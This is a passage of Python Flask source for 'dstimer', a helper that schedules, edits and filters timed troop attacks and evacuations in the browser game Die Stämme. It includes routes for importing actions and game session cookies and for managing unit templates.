dstimer.incomings_handler as incomings_handler\nfrom dstimer.import_keks import check_and_save_sids\nfrom operator import itemgetter, attrgetter\nimport logging\nfrom dstimer.models import *\nfrom dstimer import app, db, restart\nlogger = logging.getLogger(\"dstimer\")\n\n\ndef innocdn_url(path):\n # return \"https://dsde.innogamescdn.com/8.58/30847\" + path\n return \"https://dsde.innogamescdn.com/asset/3cc5e90\" + path\n\n\ndef sids_status():\n try:\n with open(os.path.join(common.get_root_folder(), \"status.txt\")) as fd:\n return json.load(fd)\n except:\n return []\n\n\ndef get_templates():\n path = os.path.join(os.path.expanduser(\"~\"), \".dstimer\", \"templates\")\n templates = []\n for filename in 
os.listdir(path):\n if os.path.isfile(os.path.join(path, filename)):\n with open(os.path.join(path, filename)) as fd:\n units = json.load(fd)\n template = {}\n template[\"name\"] = filename[:filename.rfind(\"_\")]\n template[\"id\"] = filename[filename.rfind(\"_\") + 1:-9]\n template[\"units\"] = units\n templates.append(template)\n return templates\n\n\ndef get_scheduled_actions(folder=\"schedule\"):\n schedule_path = os.path.join(os.path.expanduser(\"~\"), \".dstimer\", folder)\n actions = []\n player = []\n village_data = None\n for file in os.listdir(schedule_path):\n if os.path.isfile(os.path.join(schedule_path, file)):\n with open(os.path.join(schedule_path, file)) as fd:\n action = json.load(fd)\n if village_data is None:\n village_data = world_data.get_village_data(action[\"domain\"]) # bug wenn angriffe von mehreren welten geplant\n for dataset in village_data:\n if action[\"source_id\"] == int(dataset[0]):\n action[\"source_village_name\"] = world_data.unquote_name(dataset[1])\n if action[\"target_id\"] == int(dataset[0]):\n action[\"target_village_name\"] = world_data.unquote_name(dataset[1])\n action[\"departure_time\"] = dateutil.parser.parse(action[\"departure_time\"])\n action[\"arrival_time\"] = dateutil.parser.parse(action[\"arrival_time\"])\n action[\"world\"] = action[\"domain\"].partition(\".\")[0]\n action[\"id\"] = file[file.rfind(\"_\") + 1:-4]\n action[\"size\"] = import_action.get_attack_size(action[\"units\"])\n if action[\"player\"] not in player:\n player.append(action[\"player\"])\n actions.append(action)\n return player, actions\n\ndef get_scheduled_data_db(attacks):\n # returns data by which a filter could be apllied\n sources = dict()\n targets = dict()\n #target_players = dict()\n stati = [\"active\", \"finished\",\"expired\", \"failed\"]\n \n if attacks:\n village_data = dict()\n for attack in attacks:\n if str(attack.source_id) not in sources:\n sources[str(attack.source_id)] = attack.source_name\n if str(attack.target_id) not in targets:\n targets[str(attack.target_id)] = attack.target_name\n if attack.player.domain not in village_data:\n village_data[attack.player.domain] = world_data.get_village_data(attack.player.domain)\n #target_player_id = None\n #for dataset in village_data[attack.player.domain]:\n # if attack.target_id == int(dataset[0]):\n # target_player_id = int(dataset[4])\n #if target_player_id:\n # if target_player_id not in target_players:\n # target_players[target_player_id] = world_data.get_player_name(attack.player.domain, target_player_id)\n #if attack.status not in stati:\n # stati.append(attack.status)\n return sources, targets, stati\n\ndef get_incomings_data(incs):\n # returns data by which a filter could be apllied\n sources = dict()\n targets = dict()\n source_players = dict()\n names = []\n units = []\n templates = dict()\n\n if incs:\n for inc in incs:\n if str(inc.source_village_id) not in sources:\n sources[str(inc.source_village_id)] = inc.source_village_name\n if str(inc.target_village_id) not in targets:\n targets[str(inc.target_village_id)] = inc.target_village_name\n if str(inc.source_player_id) not in source_players:\n source_players[str(inc.source_player_id)] = inc.source_player_name\n if inc.slowest_unit not in units:\n units.append(inc.slowest_unit)\n if inc.name not in names:\n names.append(inc.name)\n if inc.template:\n if str(inc.template.id) not in templates:\n templates[str(inc.template.id)] = inc.template.name\n elif \"None\" not in templates:\n templates[\"None\"] = \"Ignoriert\"\n data = dict(\n 
sources=sources,\n targets=targets,\n source_players=source_players,\n units=units, \n names=names,\n templates=templates)\n return data\n\n\ndef get_unitnames():\n return common.unitnames\n #return [\"spear\", \"sword\", \"axe\", \"archer\", \"spy\", \"light\", \"marcher\", \"heavy\", \"ram\", \"catapult\", \"knight\", \"snob\"]\n\n\ndef get_buildingnames():\n return common.buildingnames\n\n\ndef get_LZ_reduction():\n options = common.read_options()\n if options[\"LZ_reduction\"] != {}:\n return import_action.check_LZ(options[\"LZ_reduction\"])\n else:\n return {}\n\n\napp.jinja_env.globals.update(innocdn_url=innocdn_url, version=__version__, sids_status=sids_status,\n update=__needUpdate__, options=common.read_options(),\n get_LZ_reduction=get_LZ_reduction)\n\n\n@app.route(\"/static/\")\ndef static_files(path):\n return send_from_directory(\"static\", path)\n\n\n#def sort_unit_dict(dict):\n# units = {\"spear\":0, \"sword\":1, \"axe\":2, \"archer\":3, \"spy\":4, \"light\":5, \"marcher\":6, \"heavy\":7, \"ram\":8, \"catapult\":9, \"knight\":10, \"snob\":11}\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"erklaerbaer.html\")\n\n\n@app.route(\"/schedule\")\ndef schedule():\n player, actions = get_scheduled_actions()\n args = \"\"\n rev = \"\"\n if \"sort\" in request.args:\n args = request.args.get(\"sort\")\n rev = request.args.get(\"reverse\")\n if \"true\" in rev:\n rev_bool = True\n rev = \"false\"\n else:\n rev_bool = False\n rev = \"true\"\n if \"coord\" not in args:\n actions.sort(key=lambda x: x[args], reverse=rev_bool)\n else: #target_coords or source_coord\n actions.sort(key=lambda x: x[args][\"x\"], reverse=rev_bool)\n return render_template(\"schedule.html\", actions=actions, player=player, rev=rev)\n\n@app.route(\"/schedule_db\", methods=[\"GET\"])\ndef schedule_db():\n attacks = Attacks.query.order_by(\"departure_time\").all()\n templates = Template.query.all()\n sources, targets, stati = get_scheduled_data_db(attacks)\n filter_by = ast.literal_eval(request.args.get('filter_by') if request.args.get('filter_by') else \"{}\")\n order_by = request.args.get('order_by')\n if filter_by:\n query_filter_by = dict()\n # cant filter by unit, status, evac directly. 
\n if \"source_id\" in filter_by:\n query_filter_by[\"source_id\"] = filter_by[\"source_id\"]\n if \"target_id\" in filter_by:\n query_filter_by[\"target_id\"] = filter_by[\"target_id\"]\n\n attacks = Attacks.query.filter_by(**query_filter_by).order_by(\"departure_time\").all()\n\n if \"unit\" in filter_by:\n attacks = [attack for attack in attacks if filter_by[\"unit\"] in attack.get_units()]\n if \"evac\" in filter_by:\n if filter_by[\"evac\"] == \"1\":\n attacks = [attack for attack in attacks if attack.incs.all()]\n\n if \"status\" not in filter_by:\n attacks = [attack for attack in attacks if not attack.is_expired()]\n else:\n if filter_by[\"status\"] == \"active\":\n attacks = [attack for attack in attacks if not attack.is_expired()]\n elif filter_by[\"status\"] == \"expired\":\n attacks = [attack for attack in attacks if attack.status == \"expired\"]\n elif filter_by[\"status\"] == \"finished\":\n attacks = [attack for attack in attacks if attack.status == \"finished\"]\n else:\n attacks = [attack for attack in attacks if attack.status == \"failed\"]\n \n if order_by: # jaja noch sehr lui haft\n if \"arrival_time\" == order_by:\n attacks = sorted(attacks, key=lambda a: a.arrival_time)\n\n return render_template(\"schedule_db.html\", attacks = attacks, units = common.unitnames, sources = sources, targets = targets, stati = stati, filter_by = filter_by, buildings = common.buildingnames, templates = templates)\n\n@app.route(\"/schedule_db\", methods=[\"POST\"])\ndef schedule_db_post():\n type = request.form[\"type\"]\n current_filter_by = ast.literal_eval(request.args.get('filter_by') if request.args.get('filter_by') else \"{}\")\n filter_by = dict()\n if \"apply_filter\" in type:\n for filter in [name for name in request.form if \"filter_\" in name]:\n if request.form.get(filter) != \"default\":\n filter_by[filter.split(\"filter_by_\")[1]] = request.form.get(filter)\n return redirect(url_for(\"schedule_db\", filter_by=filter_by))\n elif \"delete__all\" in type:\n status = None\n if \"status\" in current_filter_by:\n status = current_filter_by[\"status\"]\n del current_filter_by[\"status\"]\n attacks = Attacks.query.filter_by(**current_filter_by).all()\n if status:\n if status == \"active\":\n attacks = [attack for attack in attacks if not attack.is_expired()]\n elif status == \"expired\":\n attacks = [attack for attack in attacks if attack.status == \"expired\"]\n elif status == \"finished\":\n attacks = [attack for attack in attacks if attack.status == \"finished\"]\n else:\n attacks = [attack for attack in attacks if attack.status == \"failed\"]\n for attack in attacks:\n db.session.delete(attack)\n elif \"delete__selected\" in type:\n for a_id in request.form.getlist(\"selected\"):\n attack = Attacks.query.filter_by(id = int(a_id)).first()\n db.session.delete(attack)\n elif \"delete_\" in type:\n attack = Attacks.query.filter_by(id = int(type.split(\"_\")[1])).first()\n db.session.delete(attack)\n elif \"edit_\" in type:\n id = type.split(\"_\")[1]\n attack = Attacks.query.filter_by(id = int(id)).first()\n \n if request.form.get(\"edit_template_\"+id) != \"default\":\n attack.template = Template.query.filter_by(id = int(request.form.get(\"edit_template_\"+id))).first()\n\n units = dict()\n for unit in common.unitnames:\n units[unit] = request.form.get(\"edit_unit_\"+unit+\"_\"+id) if request.form.get(\"edit_unit_\"+unit+\"_\"+id) != \"\" else 0\n \n if attack.template:\n if attack.template.get_units() != units:\n #template currently set, but now units changed manually -> delete 
relationship to template\n attack.template = None\n\n attack.units = str(units)\n\n if request.form.get(\"edit_template_\"+id) != \"default\":\n attack.template = Template.query.filter_by(id = int(request.form.get(\"edit_template_\"+id))).first()\n\n departure = dateutil.parser.parse(request.form.get(\"edit_departure_\"+id))\n arrival = dateutil.parser.parse(request.form.get(\"edit_arrival_\"+id))\n\n if departure != attack.departure_time or arrival != attack.arrival_time:\n duration = import_action.runtime(\n import_action.speed(attack.get_units(), attack.type, import_action.get_cached_unit_info(attack.player.domain)),\n import_action.distance(dict(x=attack.source_coord_x, y=attack.source_coord_y), dict(x=attack.target_coord_x, y=attack.target_coord_y)), attack.player.domain)\n\n if departure != attack.departure_time:\n attack.departure_time = departure\n attack.arrival_time = attack.departure_time + duration\n else:\n attack.arrival_time = arrival\n attack.departure_time = attack.arrival_time - duration\n \n attack.building = request.form.get(\"edit_building_\"+id)\n\n if attack.status != \"scheduled\" and not attack.is_expired():\n attack.status = \"scheduled\"\n \n attack.autocomplete()\n db.session.add(attack)\n elif \"apply_complex\" in type:\n diff = timedelta(\n hours = int(request.form.get(\"move_by_hours\")),\n minutes = int(request.form.get(\"move_by_minutes\")),\n seconds = int(request.form.get(\"move_by_seconds\")),\n microseconds = int(request.form.get(\"move_by_ms\"))*1000\n )\n template = request.form.get(\"set_template_all\")\n building = request.form.get(\"set_building_all\")\n \n for a_id in request.form.getlist(\"selected\"):\n attack = Attacks.query.filter_by(id = int(a_id)).first()\n if attack.status == \"pending\":\n continue\n attack.departure_time = attack.departure_time + diff\n attack.arrival_time = attack.arrival_time + diff\n if not attack.is_expired():\n attack.status = \"scheduled\"\n \n if template != \"default\":\n attack.template = Template.query.filter_by(id = int(template)).first()\n if building != \"default\":\n attack.building = building\n db.session.add(attack)\n \n db.session.commit()\n\n return redirect(url_for(\"schedule_db\", filter_by = ast.literal_eval(request.args.get('filter_by') if request.args.get('filter_by') else \"{}\")))\n\n@app.route(\"/schedule\", methods=[\"POST\"])\ndef schedule_post():\n schedule_path = os.path.join(os.path.expanduser(\"~\"), \".dstimer\", \"schedule\")\n trash_path = os.path.join(os.path.expanduser(\"~\"), \".dstimer\", \"trash\")\n type = request.form[\"type\"]\n if \"delete__all\" == type:\n delete_action.delete_all()\n return redirect(\"/schedule\")\n elif \"delete_\" in type:\n if delete_action.delete_single(id=type[7:len(type)]):\n return redirect(\"/schedule\") #reload\n return \"ok\"\n elif \"edit_\" in type:\n return redirect(\"/edit_action/\" + type.split(\"_\")[1])\n\n\n@app.route(\"/import\")\ndef import_action_get():\n return render_template(\"import_action.html\")\n\n\n@app.route(\"/import\", methods=[\"POST\"])\ndef import_action_post():\n try:\n text = request.form[\"text\"]\n if request.form[\"type\"] == \"action\":\n import_action.import_from_text(text=text, rand_mill=request.form.get(\"rand_mill\"))\n elif request.form[\"type\"] == \"keks\":\n import_keks.import_from_text(text)\n check_and_save_sids()\n world_data.refresh_world_data()\n return redirect(\"/dashboard\", code=302)\n except Exception as e:\n flash(\"{}: {}\".format(type(e).__name__, e))\n return redirect(url_for(\"import_action_get\", 
text=text))\n\n\n@app.route(\"/autoimport\", methods=[\"POST\"])\ndef autoimport_action_post():\n req_data = request.get_json()\n import_action.import_from_tampermonkey(action=req_data)\n return req_data\n\n\n@app.route(\"/wb\")\ndef wb_get():\n return render_template(\"workbench_import.html\", buildings=get_buildingnames())\n\n\n@app.route(\"/wb\", methods=[\"POST\"])\ndef wb_post():\n try:\n text = request.form[\"text\"]\n keks_path = os.path.join(common.get_root_folder(), \"keks\")\n playername = \"\"#request.form[\"playername\"]\n if request.form[\"type\"] == \"wb_template\":\n import_template.import_from_workbench(text)\n return redirect(\"/templates\")\n elif request.form[\"type\"] == \"wb_text\":\n import_action.import_wb_action(text, playername, request.form.get(\"catapult_target\"), request.form.get(\"action_type\"))\n elif request.form[\"type\"] == \"wb_html\":\n import_action.import_from_workbench_html(text, request.form.get(\"catapult_target\"), request.form.get(\"action_type\"))\n return redirect(\"/schedule_db\", code=302)\n except Exception as e:\n flash(str(e))\n #return redirect(url_for(\"wb_get\", text=text))\n return redirect(url_for(\"wb_get\"))\n\n\n@app.route(\"/logs\")\ndef logs():\n path = os.path.join(os.path.expanduser(\"~\"), \".dstimer\", \"logs\", \"dstimer.log\")\n with open(path) as file:\n logs = map(json.loads, reversed(file.read().splitlines()))\n return render_template(\"logs.html\", logs=logs)\n\n\n@app.route(\"/templates\", methods=[\"GET\"])\ndef templates_get():\n t = Template.query.all()\n name = request.args.get('name') if request.args.get('name') else \"\"\n units = ast.literal_eval(request.args.get('units') if request.args.get('units') else \"{}\")\n if not Template.query.filter_by(is_default= True).first():\n flash(\"Keine Standard Template gesetzt!\")\n return render_template(\"templates.html\", templates=t, unitnames=get_unitnames(), current_name = name, current_units = units)\n\n\n@app.route(\"/templates\", methods=[\"POST\"])\ndef templates_post():\n units = get_unitnames()\n templates = Template.query.all()\n type = request.form[\"type\"]\n if type == \"new_template\":\n template_units = {}\n for name in units:\n template_units[name] = request.form.get(\"new_template_unit_\"+name)\n t = Template()\n t.set_units(template_units)\n template_name = request.form.get(\"new_template_name\")\n for template in templates:\n if template_name == template.name:\n flash(\"Template name already used.\")\n return redirect(url_for(\"templates_get\", name=template_name, units = template_units))\n t.name = template_name\n db.session.add(t)\n elif \"delete_\" in type:\n id = int(type[7:len(type)])\n if id in [t.id for t in templates]:\n t = Template.query.filter_by(id=id).first()\n db.session.delete(t)\n elif \"set-default_\" in type:\n id = int(type.split(\"_\")[1])\n if id in [t.id for t in templates]:\n dt = Template.query.filter_by(is_default=True).first()\n if dt:\n dt.is_default = False\n db.session.add(dt)\n t = Template.query.filter_by(id=id).first()\n t.is_default = True\n db.session.add(t)\n elif \"edit_template_\" in type:\n id = type.split(\"_\")[2]\n t = Template.query.filter_by(id=int(id)).first()\n template_units = dict()\n for name in units:\n template_units[name] = request.form.get(\"new_template_unit_\"+name)\n t.set_units(template_units)\n template_name = request.form.get(\"new_template_name\")\n if template_name != t.name:\n for template in templates:\n if template_name == template.name:\n flash(\"Template name already used.\")\n return 
redirect(url_for(\"templates_get\", name=template_name, units = template_units))\n t.name = template_name\n db.session.add(t)\n\n db.session.commit()\n return redirect(\"/templates\")\n\n@app.route(\"/show///\", methods=[\"GET\"]) #TODO domain\ndef show(domain, type, id):\n player, actions = get_scheduled_actions()\n filtered_actions = []\n for action in actions:\n if str(action[type]) == id and action[\"domain\"] == domain:\n action[\"milliseconds\"] = int(action[\"arrival_time\"].microsecond / 1000)\n filtered_actions.append(action)\n return jsonify(filtered_actions)\n\n\n@app.route(\"/new_attack\", methods=[\"GET\"])\ndef new_atts_get():\n keks_path = os.path.join(common.get_root_folder(), \"keks\")\n players = []\n for folder in os.listdir(keks_path):\n for file in os.listdir(os.path.join(keks_path, folder)):\n s_file = file.split(\"_\", 1)\n players.append({\n \"domain\": folder,\n \"id\": s_file[0],\n \"name\": common.filename_unescape(s_file[1])\n })\n return render_template(\"new_attack.html\", templates=get_templates(), unitnames=get_unitnames(),\n players=players, N_O_P=len(players), buildings=get_buildingnames())\n\n\n@app.route(\"/new_attack\", methods=[\"POST\"])\ndef new_atts_post():\n action = {}\n action[\"source_coord\"] = {\"x\": request.form[\"source_x\"], \"y\": request.form[\"source_y\"]}\n action[\"target_coord\"] = {\"x\": request.form[\"target_x\"], \"y\": request.form[\"target_y\"]}\n unitnames = get_unitnames()\n action[\"units\"] = {}\n for name in unitnames:\n if request.form[name] != \"\":\n action[\"units\"][name] = request.form[name]\n if request.form.get(\"departure\"):\n action[\"departure_time\"] = request.form[\"time\"]\n else:\n action[\"arrival_time\"] = request.form[\"time\"]\n source_player = request.form.get(\"source_player_select\").split(\"+\")\n action[\"player_id\"] = source_player[0]\n action[\"domain\"] = source_player[1]\n action[\"source_id\"] = int(\n request.form.get(\"source_village\")\n if request.form.get(\"source_village\") != \"\" else world_data.get_village_id_from_coords(\n action[\"domain\"], action[\"source_coord\"][\"x\"], action[\"source_coord\"][\"y\"]))\n action[\"target_id\"] = int(\n request.form.get(\"target_village\")\n if request.form.get(\"target_village\") != \"\" else world_data.get_village_id_from_coords(\n action[\"domain\"], action[\"target_coord\"][\"x\"], action[\"target_coord\"][\"y\"]))\n action[\"type\"] = request.form[\"type\"]\n action[\"player\"] = world_data.get_player_name(action[\"domain\"], action[\"player_id\"])\n action[\"sitter\"] = \"0\"\n action[\"vacation\"] = \"0\"\n action[\"force\"] = False\n\n if request.form.get(\"save_default_attack_building\"):\n action[\"save_default_attack_building\"] = 1\n else:\n action[\"save_default_attack_building\"] = 0\n action[\"building\"] = request.form.get(\"catapult_target\")\n\n id = import_action.import_from_ui(action)\n return redirect(\"/schedule\") if action[\"type\"] != \"multiple_attacks\" else redirect(\n \"/add_attacks/\" + id)\n\n\n@app.route(\"/add_attacks/\")\ndef add_attacks(id):\n player, actions = get_scheduled_actions(\"temp_action\")\n for a in actions:\n if id == a[\"id\"]:\n action = a\n action[\"target_player\"] = world_data.get_player_name(\n action[\"domain\"], world_data.get_village_owner(action[\"domain\"],\n action[\"target_id\"]))\n break\n return render_template(\"add_attacks.html\", templates=get_templates(), unitnames=get_unitnames(),\n action=action)\n\n\n@app.route(\"/add_attacks/\", methods=[\"POST\"])\ndef add_attacks_post(id):\n 
NoA = int(request.form[\"type\"])\n player, actions = get_scheduled_actions(\"temp_action\")\n action = []\n for a in actions:\n if id == a[\"id\"]:\n a[\"departure_time\"] = str(a[\"departure_time\"]).replace(\" \", \"T\")\n del a[\"arrival_time\"]\n action.append(a)\n break\n min_time_diff = common.read_options()[\"min_time_diff\"]\n speed = import_action.speed(action[0][\"units\"], \"\",\n import_action.get_cached_unit_info(action[0][\"domain\"]))\n action[0][\"type\"] = \"attack\"\n for i in range(1, NoA + 1):\n a = action[0].copy()\n a[\"units\"] = {}\n for name in get_unitnames():\n n = name + \"_\" + str(i)\n if request.form[n] != \"\":\n a[\"units\"][name] = request.form[n]\n if speed != import_action.speed(a[\"units\"], \"\",\n import_action.get_cached_unit_info(a[\"domain\"])):\n logger.info(\"change in unitspeed after adding attack\")\n return redirect(\"/add_attacks/\" + id)\n departure = a[\"departure_time\"].split(\".\")\n if len(departure) == 1:\n departure.append(0)\n a[\"departure_time\"] = departure[0] + \".\" + str(\n int(departure[1]) + (1000 * i * min_time_diff))\n action.append(a)\n for i in range(1, NoA + 1):\n action[NoA - i][\"next_attack\"] = import_action.import_from_ui(action[NoA + 1 - i])\n import_action.import_from_ui(action[0])\n delete_action.delete_single(id, \"temp_action\")\n return redirect(\"/schedule\")\n\n\n@app.route(\"/new_attack_show/\")\ndef create_action_show(json_escaped):\n return\n\n\n@app.route(\"/edit_action/\", methods=[\"GET\"])\ndef edit_action_get(id):\n player, actions = get_scheduled_actions()\n action = {}\n for a in actions:\n if id == a[\"id\"]:\n action = a\n action[\"target_player\"] = world_data.get_player_name(\n action[\"domain\"], world_data.get_village_owner(action[\"domain\"],\n action[\"target_id\"]))\n break\n keks_path = os.path.join(common.get_root_folder(), \"keks\")\n players = []\n for folder in os.listdir(keks_path):\n for file in os.listdir(os.path.join(keks_path, folder)):\n s_file = file.split(\"_\", 1)\n players.append({\n \"domain\": folder,\n \"id\": s_file[0],\n \"name\": common.filename_unescape(s_file[1])\n })\n return render_template(\"edit_action.html\", players=players, action=action,\n unitnames=get_unitnames(), templates=get_templates(),\n buildings=get_buildingnames())\n\n@app.route(\"/edit_action/\", methods=[\"POST\"])\ndef edit_action_post(id):\n if request.form[\"type\"] == \"abbort\":\n return redirect(\"/schedule\")\n action = {}\n action[\"source_coord\"] = {\"x\": request.form[\"source_x\"], \"y\": request.form[\"source_y\"]}\n action[\"target_coord\"] = {\"x\": request.form[\"target_x\"], \"y\": request.form[\"target_y\"]}\n unitnames = get_unitnames()\n action[\"units\"] = {}\n for name in unitnames:\n if request.form[name] != \"\":\n action[\"units\"][name] = request.form[name]\n if request.form.get(\"departure\"):\n action[\"departure_time\"] = request.form[\"time\"]\n else:\n action[\"arrival_time\"] = request.form[\"time\"]\n source_player = request.form.get(\"source_player_select\").split(\"+\")\n action[\"player_id\"] = source_player[0]\n action[\"domain\"] = source_player[1]\n action[\"source_id\"] = int(\n request.form.get(\"source_village\")\n if request.form.get(\"source_village\") != \"\" else world_data.get_village_id_from_coords(\n action[\"domain\"], action[\"source_coord\"][\"x\"], action[\"source_coord\"][\"y\"]))\n action[\"target_id\"] = int(\n request.form.get(\"target_village\")\n if request.form.get(\"target_village\") != \"\" else world_data.get_village_id_from_coords(\n 
action[\"domain\"], action[\"target_coord\"][\"x\"], action[\"target_coord\"][\"y\"]))\n action[\"type\"] = request.form[\"type\"]\n action[\"player\"] = world_data.get_player_name(action[\"domain\"], action[\"player_id\"])\n action[\"sitter\"] = \"0\"\n action[\"vacation\"] = \"0\"\n action[\"force\"] = False\n\n if request.form.get(\"save_default_attack_building\"):\n action[\"save_default_attack_building\"] = 1\n else:\n action[\"save_default_attack_building\"] = 0\n action[\"building\"] = request.form.get(\"catapult_target\")\n\n import_action.import_from_ui(action, id=id)\n return redirect(\"/schedule\")\n\n\n@app.route(\"/villages_of_player//\")\ndef villages_of_player(domain, player_id):\n res = world_data.get_villages_of_player(domain, player_id=player_id)\n return jsonify(res)\n\n\n@app.route(\"/load_players/\")\ndef load_players(domain):\n res = world_data.get_players(domain)\n return jsonify(res)\n\n\n@app.route(\"/delete_action/\")\ndef delete_single_action(id):\n if delete_action.delete_single(id):\n return \"1\"\n\n\n@app.route(\"/options\", methods=[\"GET\"])\ndef options_get():\n return render_template(\"options.html\", templates=get_templates())\n\n\n@app.route(\"/options\", methods=[\"POST\"])\ndef options_post():\n options = common.read_options()\n if request.form[\"type\"] == \"refresh-world-data\":\n world_data.refresh_world_data()\n elif request.form[\"type\"] == \"kata-target\":\n logger.info(\"standard Kataziel ausgewählt: \" + request.form.get(\"kata-target-menu\"))\n options[\"kata-target\"] = request.form.get(\"kata-target-menu\")\n elif request.form[\"type\"] == \"reset-folders\":\n common.reset_folders()\n elif request.form[\"type\"] == \"donate_toogle\":\n options[\"show_donate\"] = not options[\"show_donate\"]\n elif request.form[\"type\"] == \"LZ_reduction\":\n new_LZ = {\n \"until\": request.form.get(\"LZ_reduction_until\"),\n \"player\": request.form.get(\"LZ_reduction_target_input\"),\n \"magnitude\": request.form.get(\"LZ_reduction_percent_input\"),\n \"domain\": request.form.get(\"LZ_reduction_domain_input\")\n }\n options[\"LZ_reduction\"] = import_action.check_LZ(new_LZ)\n elif request.form[\"type\"] == \"LZ_reduction_delete\":\n options[\"LZ_reduction\"] = {}\n elif request.form[\"type\"] == \"min_time_diff\":\n options[\"min_time_diff\"] = int(request.form.get(\"min_time_diff\"))\n elif request.form[\"type\"] == \"evac_template\":\n options[\"evac_template\"] = request.form.get(\"evac_template\")\n common.write_options(options)\n app.jinja_env.globals.update(options=options)\n return redirect(\"/options\")\n\n@app.route(\"/keks_overview\", methods = [\"GET\"])\ndef keks_overview():\n players = Player.query.all()\n return render_template(\"keks_overview.html\", players = players) \n\n\n@app.route(\"/incomings//\", methods=[\"GET\"])\ndef incomings_get(domain, player_id):\n player = Player.query.filter_by(domain=domain, player_id=player_id).first_or_404()\n incs = Incomings.query.filter_by(player = player).order_by(\"arrival_time\").all()\n templates = Template.query.all()\n filter_by = ast.literal_eval(request.args.get('filter_by') if request.args.get('filter_by') else \"{}\")\n data = get_incomings_data(incs)\n if filter_by:\n if \"source_id\" in filter_by:\n incs = [inc for inc in incs if inc.source_village_id == int(filter_by[\"source_id\"])]\n if \"target_id\" in filter_by:\n incs = [inc for inc in incs if inc.target_village_id == int(filter_by[\"target_id\"])]\n if \"source_player_id\" in filter_by:\n incs = [inc for inc in incs if 
inc.source_player_id == int(filter_by[\"source_player_id\"])]\n if \"slowest_unit\" in filter_by:\n incs = [inc for inc in incs if inc.slowest_unit == filter_by[\"slowest_unit\"]]\n if \"template\" in filter_by:\n if filter_by[\"template\"] != \"None\":\n incs = [inc for inc in incs if inc.template if inc.template.id == filter_by[\"template\"]]\n else:\n incs = [inc for inc in incs if not inc.template]\n if \"name\" in filter_by:\n incs = [inc for inc in incs if filter_by[\"name\"] in inc.name]\n return render_template(\"incomings.html\", player = player, incs = incs, filter_by = filter_by, data = data, templates = templates)\n\n@app.route(\"/incomings//\", methods=[\"POST\"])\ndef incomings_post(domain, player_id):\n type = request.form[\"type\"]\n\n current_filter_by = ast.literal_eval(request.args.get('filter_by') if request.args.get('filter_by') else \"{}\")\n filter_by = dict()\n if \"apply_filter\" in type:\n for filter in [name for name in request.form if \"filter_\" in name]:\n if request.form.get(filter) != \"default\" and request.form.get(filter) != \"\":\n filter_by[filter.split(\"filter_by_\")[1]] = request.form.get(filter)\n return redirect(url_for(\"incomings_get\", domain = domain, player_id = player_id, filter_by=filter_by))\n return redirect(url_for(\"incomings_get\", domain = domain, player_id = player_id, filter_by = current_filter_by))\n\n@app.route(\"/inc_options//\", methods=[\"GET\"])\ndef inc_options(domain, player_id):\n p = Player.query.filter_by(player_id=player_id, domain = domain).first_or_404()\n p.refresh_groups()\n i = Inctype.query.all()\n t = Template.query.all()\n return render_template(\"inc_options.html\", templates = t, player = p, inctypes = i)\n\n@app.route(\"/inc_options//\", methods=[\"POST\"])\ndef inc_options_post(domain, player_id):\n p = Player.query.filter_by(player_id=player_id, domain = domain).first_or_404()\n i = Inctype.query.all()\n\n if request.form[\"type\"] == \"add_group\":\n g = p.groups.filter_by(group_id=request.form.get(\"add_group_menu\")).first()\n priority = int(request.form.get(\"add_group_priority\"))\n if priority not in p.get_used_group_priorities():\n g.is_used = True\n g.priority = priority\n db.session.add(g)\n else:\n flash(\"Priorität {} bereits besetzt von Gruppe [{}].\".format(priority, p.groups.filter_by(is_used=True, priority=priority).first().name))\n \n elif request.form[\"type\"] == \"submit_changes\":\n # mark groups as unused\n delete_groups = [int(group_id) for group_id in request.form.getlist(\"delete_group\")]\n for group_id in delete_groups:\n g = p.groups.filter_by(group_id=group_id).first()\n g.is_used = False\n g.priority = None\n db.session.add(g)\n formnames = [name for name in request.form if \"use-template_\" in name]\n ignore = [name.split(\"_\") for name in request.form.getlist(\"ignore\")]\n for name in formnames:\n t_id = request.form.get(name)\n [group_id, inc_id] = name.split(\"_\")[1:]\n group = Group.query.filter_by(group_id = group_id).first()\n inctype = Inctype.query.filter_by(id = inc_id).first()\n\n e = Evacoption.query.filter_by(group = group, inctype = inctype).first()\n if not e:\n e = Evacoption(\n group = group, \n inctype = inctype, \n )\n e.template = Template.query.filter_by(id = t_id).first()\n e.is_ignored = [group_id, inc_id] in ignore\n\n db.session.add(e)\n \n elif request.form[\"type\"] == \"refresh_groups\":\n p.refresh_groups(1)\n\n elif request.form[\"type\"] == \"activate\":\n p.evac_activated = not p.evac_activated\n\n db.session.commit()\n return 
redirect(url_for(\"inc_options\", domain=domain, player_id=player_id))\n\n@app.route(\"/dashboard\", methods=[\"GET\"])\ndef dashboard_get():\n    players = Player.query.all()\n    atts = dict()\n    incs = dict()\n    for player in players:\n        attacks = Attacks.query.filter_by(player=player).all()\n        incomings = Incomings.query.filter_by(player=player).all()\n        # counting amount of scheduled+pending, finished, expired, failed atts\n        NO_active = len([attack for attack in attacks if not attack.is_expired()]) \n        NO_finished = len([attack for attack in attacks if attack.status == \"finished\"])\n        NO_expired = len([attack for attack in attacks if attack.status == \"expired\"])\n        NO_failed = len([attack for attack in attacks if attack.status == \"failed\"])\n        NO_incs = len(incomings)\n        NO_ignored_incs = len([incoming for incoming in incomings if not incoming.template])\n\n        atts[player.id] = dict(\n            active = {\"NO\" : NO_active, \"badge\" : \"\", \"filter_by\" : str(dict(status = \"active\"))},\n            finished = {\"NO\" : NO_finished, \"badge\" : \"alert-success\", \"filter_by\" : str(dict(status = \"finished\"))},\n            expired = {\"NO\" : NO_expired, \"badge\" : \"alert-warning\", \"filter_by\" : str(dict(status = \"expired\"))},\n            failed = {\"NO\" : NO_failed, \"badge\" : \"alert-danger\", \"filter_by\" : str(dict(status = \"failed\"))}\n        )\n        incs[player.id] = dict(\n            incs = NO_incs,\n            ignored = NO_ignored_incs\n        )\n    if not Template.query.filter_by(is_default= True).first():\n        flash(\"Keine Standard Template gesetzt!\")\n\n    return render_template(\"dashboard.html\", players=players, atts=atts, incs = incs)\n\n@app.route(\"/dashboard\", methods=[\"POST\"])\ndef dashboard_post():\n    if request.form.get(\"type\") == \"restart\":\n        restart.restart_program()\n    return redirect(url_for(\"dashboard_get\"))\n\n@app.route(\"/add_inc//\", methods=[\"GET\"])\ndef add_inc(domain, player_id):\n    player = Player.query.filter_by(domain = domain, player_id = player_id).first()\n    villages = Village.query.filter_by(player = player).all()\n    return render_template(\"add_inc.html\", player = player, villages = villages, now = datetime.now()+timedelta(minutes=1))\n\n@app.route(\"/add_inc//\", methods=[\"POST\"])\ndef add_inc_post(domain, player_id):\n    source_id = request.form.get(\"source\")\n    target_id = 